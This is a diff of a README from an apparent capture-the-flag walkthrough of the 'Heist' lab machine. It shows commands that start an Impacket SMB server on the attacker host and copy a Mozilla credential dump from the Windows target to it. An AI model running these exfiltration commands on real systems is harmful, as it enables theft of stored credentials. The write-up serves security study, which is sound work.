roughiz/Heist-walktrough/README.md

 ```
 ![flagrootlocally](https://github.com/roughiz/Heist-walktrough/blob/master/flagrootlocally.png)
 ### Nota :
-- My wirn ruby script dosen't work for this box , i tried an other simple script. (don't know why!!)
+- My winRm ruby script dosen't work for this box , i tried an other simple [script](https://alionder.net/winrm-shell/). (don't know why!!)

 - I used smbserver.py from Impacket to exfiltrate the dump.
 Firstly we have to launch the smb server with credentials like :
 ```
 $ sudo smbserver.py share $(pwd) -smb2support -username df -password df
 ```
-And in the windows box we first authenticate to the server like :
+And in the windows box we first authenticate to the server, and copy the file like :
 ```
 $ net use \\10.10.14.4\share /u:df df
 $ copy mozilla_dump** \\10.10.14.4\share\